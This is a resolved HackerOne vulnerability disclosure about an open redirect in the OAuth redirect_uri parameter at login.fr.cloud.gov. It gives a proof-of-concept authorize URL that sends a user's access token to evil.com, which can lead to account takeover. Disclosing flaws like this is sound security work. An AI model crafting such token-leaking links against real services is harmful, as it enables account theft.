Stealing Users OAuth Tokens through redirect_uri parameter

Disclosed: 2019-10-01 18:25:11 By manshum12 To gsa_bbp
High
Vulnerability Details
I found that https://login.fr.cloud.gov/oauth/authorize has vulnerability by open redirect on oauth redirect_uri which can lead to users oauth tokens being leaked to any malicious user. Step : 1, Clicked on link https://login.fr.cloud.gov/oauth/authorize?client_id=███&response_type=token&redirect_uri=https%3A%2F%2Fevil.com%2Fauth%2Fcallback&state=███ 2, Choose any .gov account to login ( Screenshot ) then i believe you will got redirect to evil.com with oauth access token . ## Impact Attacker can using this bug to stolen victim access token , that means he can takeover victim account .
Actions
View on HackerOne
Report Stats
  • Report ID: 665651
  • State: Closed
  • Substate: resolved
  • Upvotes: 53
Share this report